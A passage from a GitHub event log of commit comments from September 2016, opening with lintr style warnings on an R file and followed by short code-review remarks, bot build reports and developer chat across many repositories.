~^~\n```\n[R/generateArtificialData.R:56:90:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n                                                                                        ~^~\n```\n[R/generateArtificialData.R:57:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L57) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  comm_spec_matrix[i, c(present_species)] <- 1\n^\n```\n[R/generateArtificialData.R:57:29:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L57) *style:* **Put spaces around all infix operators.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n                           ~^~~\n```\n[R/generateArtificialData.R:58:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L58) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:59:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L59) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix\n^\n```\n[R/generateArtificialData.R:60:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L60) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) traits_pool_df <-\n^\n```\n[R/generateArtificialData.R:62:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L62) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1 <- c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n^\n```\n[R/generateArtificialData.R:63:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L63) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) comm_spec_matrix <-\n^\n```\n[R/generateArtificialData.R:63:11:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L63) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) traits_pool_df <-\n          ^\n```\n[R/generateArtificialData.R:63:58:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L63) *style:* **Put spaces around all infix operators.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) traits_pool_df <-\n                                                        ~^~~\n```\n[R/generateArtificialData.R:65:14:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L65) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n            ~^~~\n```\n[R/generateArtificialData.R:65:62:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L65) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n                                                            ~^~~\n```\n[R/generateArtificialData.R:66:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L66) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix <- as.data.frame(cbind(comm_spec_matrix, rep(\"\", n_communities)))\n^\n```\n[R/generateArtificialData.R:66:11:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L66) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) comm_spec_matrix <-\n          ^\n```\n[R/generateArtificialData.R:66:58:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L66) *style:* **Put spaces around all infix operators.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) comm_spec_matrix <-\n                                                        ~^~~\n```\n[R/generateArtificialData.R:67:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L67) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(comm_spec_matrix) <- row1\n^\n```\n[R/generateArtificialData.R:69:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L69) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tplots <- as.data.frame(matrix(as.numeric(as.matrix(comm_spec_matrix[, -ncol(comm_spec_matrix)])),\n^\n```\n[R/generateArtificialData.R:69:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L69) *style:* **lines should not be more than 80 characters.**\n```r\n​\tcomm_spec_matrix <- as.data.frame(cbind(comm_spec_matrix, rep(\"\", n_communities)))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:69:26:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L69) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- as.data.frame(cbind(comm_spec_matrix, rep(\"\", n_communities)))\n                        ~^~~\n```\n[R/generateArtificialData.R:70:33:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L70) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(comm_spec_matrix) <- row1\n                               ~^~~\n```\n[R/generateArtificialData.R:72:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L72) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(plots) <- traits_pool_df[, 1]\n^\n```\n[R/generateArtificialData.R:72:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L72) *style:* **lines should not be more than 80 characters.**\n```r\n​\tplots <- as.data.frame(matrix(as.numeric(as.matrix(comm_spec_matrix[, -ncol(comm_spec_matrix)])),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:72:15:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L72) *style:* **Put spaces around all infix operators.**\n```r\n​\tplots <- as.data.frame(matrix(as.numeric(as.matrix(comm_spec_matrix[, -ncol(comm_spec_matrix)])),\n             ~^~~\n```\n[R/generateArtificialData.R:74:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L74) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool_df[ ,c(2:ncol(traits_pool_df))] <- as.matrix(\n^\n```\n[R/generateArtificialData.R:75:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L75) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                traits_pool_df[ ,c(2:ncol(traits_pool_df))])\n^\n```\n[R/generateArtificialData.R:75:22:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L75) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(plots) <- traits_pool_df[, 1]\n                    ~^~~\n```\n[R/generateArtificialData.R:77:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L77) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor (i in 2:ncol(traits_pool_df)) {\n^\n```\n[R/generateArtificialData.R:77:53:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L77) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool_df[ ,c(2:ncol(traits_pool_df))] <- as.matrix(\n                                                   ~^~~\n```\n[R/generateArtificialData.R:79:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L79) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:80:1:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L80) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\toutput <- list( traits = traits_pool_df, abundances = plots);\n^\n```\n[R/generateArtificialData.R:80:13:](https://github.com/thijsjanzen/STEPCAM/blob/4711a0d516fc6305eb0969fa95384e2005ccf507/R/generateArtificialData.R#L80) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor (i in 2:ncol(traits_pool_df)) {\n            ^\n```\n"}},"created_at":"2016-09-21T12:13:31Z"}
{"id":"4595846508","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19112606,"position":null,"line":null,"path":null,"commit_id":"387b3b84f211e2d32ff5f6b5e205ae2c212f2403","created_at":"2016-09-21T12:14:17Z","updated_at":"2016-09-21T12:14:17Z","body":"Sizing-Simple-Chilled-Ceiling (RKStrand) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-387b3b84f211e2d32ff5f6b5e205ae2c212f2403-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-21T12:14:17Z"}
{"id":"4595846955","type":"CommitCommentEvent","actor":{"login":"jb3-2"},"repo":{"name":"StataBS/indikatoren"},"payload":{"comment":{"id":19112608,"position":null,"line":null,"path":null,"commit_id":"f31a768c3c423506d1de840704f1897a4f41ee19","created_at":"2016-09-21T12:14:23Z","updated_at":"2016-09-21T12:14:23Z","body":"Gute Idee, das sieht schöner aus. Lass uns dies bald mal machen, aber erst nach dem Go-Live. "}},"created_at":"2016-09-21T12:14:23Z"}
{"id":"4595847652","type":"CommitCommentEvent","actor":{"login":"ewoldenberg"},"repo":{"name":"dmmc12/public-api"},"payload":{"comment":{"id":19112609,"position":46,"line":46,"path":"get_account_numbers","commit_id":"82af1c9c2588dbb3f5ed7aeaacccce963392ac9b","created_at":"2016-09-21T12:14:31Z","updated_at":"2016-09-21T12:14:31Z","body":"http://pandas.pydata.org/pandas-docs/stable/io.html#io-store-in-csv"}},"created_at":"2016-09-21T12:14:31Z"}
{"id":"4595849789","type":"CommitCommentEvent","actor":{"login":"ewoldenberg"},"repo":{"name":"dmmc12/public-api"},"payload":{"comment":{"id":19112614,"position":24,"line":24,"path":"get_account_numbers","commit_id":"82af1c9c2588dbb3f5ed7aeaacccce963392ac9b","created_at":"2016-09-21T12:14:59Z","updated_at":"2016-09-21T12:14:59Z","body":"Let's delete this - might be confusing"}},"created_at":"2016-09-21T12:14:59Z"}
{"id":"4595851692","type":"CommitCommentEvent","actor":{"login":"ewoldenberg"},"repo":{"name":"dmmc12/public-api"},"payload":{"comment":{"id":19112625,"position":20,"line":20,"path":"get_account_numbers","commit_id":"82af1c9c2588dbb3f5ed7aeaacccce963392ac9b","created_at":"2016-09-21T12:15:23Z","updated_at":"2016-09-21T12:15:23Z","body":"Maybe only print if it fails"}},"created_at":"2016-09-21T12:15:23Z"}
{"id":"4595854880","type":"CommitCommentEvent","actor":{"login":"ewoldenberg"},"repo":{"name":"dmmc12/public-api"},"payload":{"comment":{"id":19112631,"position":48,"line":48,"path":"get_account_numbers","commit_id":"82af1c9c2588dbb3f5ed7aeaacccce963392ac9b","created_at":"2016-09-21T12:16:06Z","updated_at":"2016-09-21T12:16:06Z","body":"Add a print statement saying your list of numbers is in numbers.csv\r\n"}},"created_at":"2016-09-21T12:16:06Z"}
{"id":"4595857545","type":"CommitCommentEvent","actor":{"login":"nixel2007"},"repo":{"name":"silverbulleters/vanessa-behavior-new"},"payload":{"comment":{"id":19112638,"position":15,"line":155,"path":"vanessa-behavior/VanessaBehavior/Forms/УправляемаяФорма/Ext/Form/Module.bsl","commit_id":"fd0b3e4629d8524f10b9219fbeb0ecb01f96e22a","created_at":"2016-09-21T12:16:39Z","updated_at":"2016-09-21T12:16:39Z","body":"@JohnyDeath тест другого режима выдачи комментариев от SQ"}},"created_at":"2016-09-21T12:16:39Z"}
{"id":"4595859389","type":"CommitCommentEvent","actor":{"login":"ewoldenberg"},"repo":{"name":"dmmc12/public-api"},"payload":{"comment":{"id":19112643,"position":10,"line":10,"path":"get_account_numbers","commit_id":"82af1c9c2588dbb3f5ed7aeaacccce963392ac9b","created_at":"2016-09-21T12:17:03Z","updated_at":"2016-09-21T12:17:03Z","body":"I like this "}},"created_at":"2016-09-21T12:17:03Z"}
{"id":"4595859470","type":"CommitCommentEvent","actor":{"login":"qinglee"},"repo":{"name":"CTeX-org/ctex-kit"},"payload":{"comment":{"id":19112644,"position":null,"line":null,"path":null,"commit_id":"5762a604b89acb9010251c6e41272b9bcddbca77","created_at":"2016-09-21T12:17:04Z","updated_at":"2016-09-21T12:17:04Z","body":"是，不过 `\\clearpage` 也是一种 penalty XD"}},"created_at":"2016-09-21T12:17:04Z"}
{"id":"4595862620","type":"CommitCommentEvent","actor":{"login":"NullVoxPopuli"},"repo":{"name":"etkirsch/gmusic"},"payload":{"comment":{"id":19112648,"position":8,"line":10,"path":"README.md","commit_id":"0c52d34a14e4eb9046684ebab7a411e516115f29","created_at":"2016-09-21T12:17:45Z","updated_at":"2016-09-21T12:17:45Z","body":"this should probably be kept in the readme, until it is generated"}},"created_at":"2016-09-21T12:17:45Z"}
{"id":"4595863091","type":"CommitCommentEvent","actor":{"login":"ibaca"},"repo":{"name":"ibaca/dndfiles-gwt"},"payload":{"comment":{"id":19112657,"position":null,"line":null,"path":null,"commit_id":"aa697a6812ef66e29c2f7648221418de35a96a1e","created_at":"2016-09-21T12:17:52Z","updated_at":"2016-09-21T12:17:52Z","body":"<img width=\"667\" alt=\"screen shot 2016-09-21 at 08 58 41\" src=\"https://cloud.githubusercontent.com/assets/1042225/18710566/2d2e3d58-8006-11e6-8a42-826c0a6ba514.png\">\r\n"}},"created_at":"2016-09-21T12:17:52Z"}
{"id":"4595866916","type":"CommitCommentEvent","actor":{"login":"3nids"},"repo":{"name":"QGEP/QGEP"},"payload":{"comment":{"id":19112671,"position":null,"line":null,"path":null,"commit_id":"41c0014d8d0a7e45d00cbdbe9599d5ea63e77146","created_at":"2016-09-21T12:18:40Z","updated_at":"2016-09-21T12:18:40Z","body":"well, I do it one by one....feel free to be more verbose in commit message ;)"}},"created_at":"2016-09-21T12:18:40Z"}
{"id":"4595877456","type":"CommitCommentEvent","actor":{"login":"double007"},"repo":{"name":"double007/hello_world"},"payload":{"comment":{"id":19112693,"position":1,"line":1,"path":"README.md","commit_id":"84529b911340d3c599a4e1fdec4ada16aec3c438","created_at":"2016-09-21T12:20:52Z","updated_at":"2016-09-21T12:20:52Z","body":"ou"}},"created_at":"2016-09-21T12:20:52Z"}
{"id":"4595878201","type":"CommitCommentEvent","actor":{"login":"double007"},"repo":{"name":"double007/hello_world"},"payload":{"comment":{"id":19112694,"position":null,"line":null,"path":null,"commit_id":"84529b911340d3c599a4e1fdec4ada16aec3c438","created_at":"2016-09-21T12:21:01Z","updated_at":"2016-09-21T12:21:01Z","body":"ahahah"}},"created_at":"2016-09-21T12:21:01Z"}
{"id":"4595889409","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"hakaru-dev/hakaru"},"payload":{"comment":{"id":19112718,"position":null,"line":null,"path":null,"commit_id":"a9e11b68b4dee10cb9e1a519c78a89d919c3b9db","created_at":"2016-09-21T12:23:25Z","updated_at":"2016-09-21T12:23:25Z","body":"That's an amusing way to do it.  But let's not do that -- please build a proper 'structured type', which does not do any actual computation."}},"created_at":"2016-09-21T12:23:25Z"}
{"id":"4595890543","type":"CommitCommentEvent","actor":{"login":"vkiranmaniya"},"repo":{"name":"vkiranmaniya/imad-2016-app"},"payload":{"comment":{"id":19112723,"position":null,"line":null,"path":null,"commit_id":"fc0eaac9ea295313e3d99873a88995d5e8b91dc0","created_at":"2016-09-21T12:23:39Z","updated_at":"2016-09-21T12:23:39Z","body":"![logo](https://cloud.githubusercontent.com/assets/22276302/18710726/50f1a536-8024-11e6-8c23-c36106b115ff.png)\r\n"}},"created_at":"2016-09-21T12:23:39Z"}
{"id":"4595894463","type":"CommitCommentEvent","actor":{"login":"ajithcj"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":19112731,"position":null,"line":null,"path":null,"commit_id":"54d826cf3c5dea7d3cb08435c088d18857f6c79b","created_at":"2016-09-21T12:24:29Z","updated_at":"2016-09-21T12:24:29Z","body":"Since it adds complexity shouldn't this run as SPRT[0,5]"}},"created_at":"2016-09-21T12:24:29Z"}
{"id":"4595894783","type":"CommitCommentEvent","actor":{"login":"m-kuhn"},"repo":{"name":"QGEP/QGEP"},"payload":{"comment":{"id":19112733,"position":null,"line":null,"path":null,"commit_id":"41c0014d8d0a7e45d00cbdbe9599d5ea63e77146","created_at":"2016-09-21T12:24:33Z","updated_at":"2016-09-21T12:24:33Z","body":"No worries, I didn't feel any pressure while writing these messages :)\r\n\r\nThe not-so-easy-to-integrate changes are not yet merged but I'll probably do a pull request for those."}},"created_at":"2016-09-21T12:24:33Z"}
{"id":"4595894928","type":"CommitCommentEvent","actor":{"login":"shubhankar1100"},"repo":{"name":"shubhankar1100/logging-log4j2"},"payload":{"comment":{"id":19112735,"position":null,"line":null,"path":null,"commit_id":"39cd9449ffd727d1f26f00d8186f09c41aab2101","created_at":"2016-09-21T12:24:35Z","updated_at":"2016-09-21T12:24:35Z","body":"Please review and merge this as this is high priority"}},"created_at":"2016-09-21T12:24:35Z"}
{"id":"4595897183","type":"CommitCommentEvent","actor":{"login":"hajoeichler"},"repo":{"name":"sphereio/sphere-node-product-csv-sync"},"payload":{"comment":{"id":19112741,"position":null,"line":null,"path":null,"commit_id":"27e5549a3911aa8e8b884b2c6f6e3657bec938cb","created_at":"2016-09-21T12:25:04Z","updated_at":"2016-09-21T12:25:04Z","body":"I suggest to add another value in the array containing only languages that are not requested in the headers."}},"created_at":"2016-09-21T12:25:04Z"}
{"id":"4595903656","type":"CommitCommentEvent","actor":{"login":"dehrax"},"repo":{"name":"dehrax/generator-react-c"},"payload":{"comment":{"id":19112753,"position":null,"line":null,"path":null,"commit_id":"0842e4563b9cf91ac64fe44ca6b5adc58e0c618c","created_at":"2016-09-21T12:26:27Z","updated_at":"2016-09-21T12:26:27Z","body":"Fix #3 "}},"created_at":"2016-09-21T12:26:27Z"}
{"id":"4595905100","type":"CommitCommentEvent","actor":{"login":"Mr-Hyde-Inwind"},"repo":{"name":"Mr-Hyde-Inwind/MyTest_Python3"},"payload":{"comment":{"id":19112756,"position":null,"line":null,"path":null,"commit_id":"fee22c190e1aba8d2ef06190b7dcda2892ab55ef","created_at":"2016-09-21T12:26:46Z","updated_at":"2016-09-21T12:26:46Z","body":"Crawler for e-hentai"}},"created_at":"2016-09-21T12:26:46Z"}
{"id":"4595905837","type":"CommitCommentEvent","actor":{"login":"ystefa"},"repo":{"name":"ystefa/my_first_repository"},"payload":{"comment":{"id":19112758,"position":1,"line":1,"path":"README.md","commit_id":"9e567e03fc71979d38fee7c94ae900b5a3c096e8","created_at":"2016-09-21T12:26:56Z","updated_at":"2016-09-21T12:26:56Z","body":"+hello w"}},"created_at":"2016-09-21T12:26:56Z"}
{"id":"4595907349","type":"CommitCommentEvent","actor":{"login":"youle31"},"repo":{"name":"UPBGE/blender"},"payload":{"comment":{"id":19112759,"position":null,"line":null,"path":null,"commit_id":"8ec8612920140562d1b8b488ad34cf970e38321f","created_at":"2016-09-21T12:27:15Z","updated_at":"2016-09-21T12:27:15Z","body":"I fixed my branch (I'm not totally sure but it seems to work fine with my test files and I noticed a performance increase in all files): https://github.com/UPBGE/blender/commit/0cb633093d99"}},"created_at":"2016-09-21T12:27:15Z"}
{"id":"4595908000","type":"CommitCommentEvent","actor":{"login":"shubhankar1100"},"repo":{"name":"rgoers/logback"},"payload":{"comment":{"id":19112760,"position":13,"line":71,"path":"logback-classic/src/test/java/ch/qos/logback/classic/turbo/ReconfigureOnChangeTest.java","commit_id":"9aebf697cc7ab0e62f929090cbb6f8ad729e2757","created_at":"2016-09-21T12:27:23Z","updated_at":"2016-09-21T12:27:23Z","body":"Is this required?\r\n"}},"created_at":"2016-09-21T12:27:23Z"}
{"id":"4595908182","type":"CommitCommentEvent","actor":{"login":"snicoll"},"repo":{"name":"spring-io/initializr"},"payload":{"comment":{"id":19112761,"position":9,"line":9,"path":"initializr-generator/src/main/resources/templates/gitignore.tmpl","commit_id":"d61bf18fa2b7703783ae5315f431afaf5c1d2876","created_at":"2016-09-21T12:27:25Z","updated_at":"2016-09-21T12:27:25Z","body":"@shakuzen don't bother creating the issue. I've polished the support. Please give that a try and open a separate issue if other changes are required. Thanks!"}},"created_at":"2016-09-21T12:27:25Z"}
{"id":"4595910821","type":"CommitCommentEvent","actor":{"login":"3nids"},"repo":{"name":"QGEP/QGEP"},"payload":{"comment":{"id":19112765,"position":null,"line":null,"path":null,"commit_id":"41c0014d8d0a7e45d00cbdbe9599d5ea63e77146","created_at":"2016-09-21T12:28:00Z","updated_at":"2016-09-21T12:28:00Z","body":":+1: "}},"created_at":"2016-09-21T12:28:00Z"}
{"id":"4595911358","type":"CommitCommentEvent","actor":{"login":"panzergame"},"repo":{"name":"UPBGE/blender"},"payload":{"comment":{"id":19112767,"position":null,"line":null,"path":null,"commit_id":"ba0a447d9cbc2f86b3efd40f9eb25e4947bd6673","created_at":"2016-09-21T12:28:08Z","updated_at":"2016-09-21T12:28:08Z","body":"@youle31 : Indeed the issue you exposed is right. But indeed of duplicating material, i'm trying to made attributes layer(=uv index array) contained in the meshes (which can be multiple by materials) and not per materials like for the shader attributes."}},"created_at":"2016-09-21T12:28:08Z"}
{"id":"4595911791","type":"CommitCommentEvent","actor":{"login":"shubhankar1100"},"repo":{"name":"rgoers/logback"},"payload":{"comment":{"id":19112769,"position":27,"line":84,"path":"logback-classic/src/test/java/ch/qos/logback/classic/turbo/ReconfigureOnChangeTest.java","commit_id":"9aebf697cc7ab0e62f929090cbb6f8ad729e2757","created_at":"2016-09-21T12:28:13Z","updated_at":"2016-09-21T12:28:13Z","body":"if required  please write it as *********TEST STOP*********"}},"created_at":"2016-09-21T12:28:13Z"}
{"id":"4595916232","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":19112776,"position":null,"line":null,"path":null,"commit_id":"54d826cf3c5dea7d3cb08435c088d18857f6c79b","created_at":"2016-09-21T12:29:09Z","updated_at":"2016-09-21T12:29:09Z","body":"If this passes it reduces the astonishment factor [POLA](https://en.wikipedia.org/wiki/Principle_of_least_astonishment), so the addition of few lines should be justified IMO."}},"created_at":"2016-09-21T12:29:09Z"}
{"id":"4595916905","type":"CommitCommentEvent","actor":{"login":"flaminisx"},"repo":{"name":"SashaUkraine/SuccessClubSite"},"payload":{"comment":{"id":19112780,"position":null,"line":null,"path":null,"commit_id":"cff6f8a4379a6457620678ef2f8cb3fce44be0dd","created_at":"2016-09-21T12:29:18Z","updated_at":"2016-09-21T12:29:18Z","body":"ты заебал, @TheZombie2111 \r\nты можешь писать коммит месседжы **нормально**?\r\nи разделять ска изменения по коммитах?\r\n\r\n "}},"created_at":"2016-09-21T12:29:18Z"}
{"id":"4595923999","type":"CommitCommentEvent","actor":{"login":"pwalsh"},"repo":{"name":"os-data/eu-structural-funds"},"payload":{"comment":{"id":19112788,"position":null,"line":null,"path":null,"commit_id":"d2924fa86035638b5934afd8a79933c3dc33f00b","created_at":"2016-09-21T12:30:43Z","updated_at":"2016-09-21T12:30:43Z","body":"LGTM"}},"created_at":"2016-09-21T12:30:43Z"}
{"id":"4595924718","type":"CommitCommentEvent","actor":{"login":"toleressea"},"repo":{"name":"netmail-open/wjelement"},"payload":{"comment":{"id":19112789,"position":null,"line":null,"path":null,"commit_id":"d5898528ca89978f2996248dbb04ec8c4cc55dc3","created_at":"2016-09-21T12:30:52Z","updated_at":"2016-09-21T12:30:52Z","body":"After running my unit tests, I noticed that this change modified the default behavior for the _required_ schema keyword. For example:\r\n\r\nSchema:\r\n`{ \"type\": \"object\", \"properties\": { \"test\": { \"type\": \"integer\" } }, \"required\": [ \"test\" ] }`\r\n\r\nInput:\r\n`{ \"TEST\": 0 }`\r\n\r\nThe validation used to return false (because the property name was incorrect and failed the required check), but now returns true. Was this intended?"}},"created_at":"2016-09-21T12:30:52Z"}
{"id":"4595927622","type":"CommitCommentEvent","actor":{"login":"gauravsars"},"repo":{"name":"gauravsars/UIDesignGym"},"payload":{"comment":{"id":19112801,"position":null,"line":null,"path":null,"commit_id":"17aa516d2222a8425f922bf040a815d0876538ed","created_at":"2016-09-21T12:31:28Z","updated_at":"2016-09-21T12:31:28Z","body":"jquery slider code added.\r\nhowever blueberry.css is missing for styling."}},"created_at":"2016-09-21T12:31:28Z"}
{"id":"4595928022","type":"CommitCommentEvent","actor":{"login":"jacegu"},"repo":{"name":"dnsimple/dnsimple-elixir"},"payload":{"comment":{"id":19112802,"position":7,"line":119,"path":"lib/dnsimple.ex","commit_id":"49b034ad790f97bf301847c399954efa9f475c18","created_at":"2016-09-21T12:31:33Z","updated_at":"2016-09-21T12:31:33Z","body":"Should this be something that we should do only for the registration endpoint?"}},"created_at":"2016-09-21T12:31:33Z"}
{"id":"4595929981","type":"CommitCommentEvent","actor":{"login":"moteus"},"repo":{"name":"fusionpbx/fusionpbx"},"payload":{"comment":{"id":19112807,"position":null,"line":null,"path":null,"commit_id":"0f7f2cdc831821ede53140ddce5019cce40bf484","created_at":"2016-09-21T12:31:57Z","updated_at":"2016-09-21T12:31:57Z","body":"Why not just use `ha_monitor.lua`? It does same thing."}},"created_at":"2016-09-21T12:31:57Z"}
{"id":"4595929992","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":19112808,"position":null,"line":null,"path":null,"commit_id":"54d826cf3c5dea7d3cb08435c088d18857f6c79b","created_at":"2016-09-21T12:31:58Z","updated_at":"2016-09-21T12:31:58Z","body":"Agreed, please follow the procedures written in the wiki: https://github.com/glinscott/fishtest/wiki/Creating-my-first-test#testing-methodology-or-when-should-i-change-the-standard-parameters-for-tests\r\n\r\nThis is not a simplification, if you feel it is a bug fix, then ask in the forum and Marco or Joona will tell :-)"}},"created_at":"2016-09-21T12:31:58Z"}
{"id":"4595931179","type":"CommitCommentEvent","actor":{"login":"aeden"},"repo":{"name":"dnsimple/dnsimple-elixir"},"payload":{"comment":{"id":19112810,"position":7,"line":119,"path":"lib/dnsimple.ex","commit_id":"49b034ad790f97bf301847c399954efa9f475c18","created_at":"2016-09-21T12:32:11Z","updated_at":"2016-09-21T12:32:11Z","body":"No, I don't see any reason to do that. We have server-side timeouts as well so a long running connection would be cut that way anyhow."}},"created_at":"2016-09-21T12:32:11Z"}
{"id":"4595932235","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/releasetasks"},"payload":{"comment":{"id":19112812,"position":null,"line":null,"path":null,"commit_id":"a1a6632fd7652e27ba33e29f9e6b63bcb4fc6a80","created_at":"2016-09-21T12:32:24Z","updated_at":"2016-09-21T12:32:24Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#By79it5ZReSpULCR4O5jXQ"}},"created_at":"2016-09-21T12:32:24Z"}
{"id":"4595932703","type":"CommitCommentEvent","actor":{"login":"jacegu"},"repo":{"name":"dnsimple/dnsimple-elixir"},"payload":{"comment":{"id":19112813,"position":7,"line":119,"path":"lib/dnsimple.ex","commit_id":"49b034ad790f97bf301847c399954efa9f475c18","created_at":"2016-09-21T12:32:30Z","updated_at":"2016-09-21T12:32:30Z","body":"👍 "}},"created_at":"2016-09-21T12:32:30Z"}
{"id":"4595934155","type":"CommitCommentEvent","actor":{"login":"BitingWind"},"repo":{"name":"BitingWind/WrittenExamination"},"payload":{"comment":{"id":19112816,"position":1,"line":1,"path":"FindHouse.java","commit_id":"4e2fb86f784be159b8b32ec15dc2d8c4391a1564","created_at":"2016-09-21T12:32:49Z","updated_at":"2016-09-21T12:32:49Z","body":"this?"}},"created_at":"2016-09-21T12:32:49Z"}
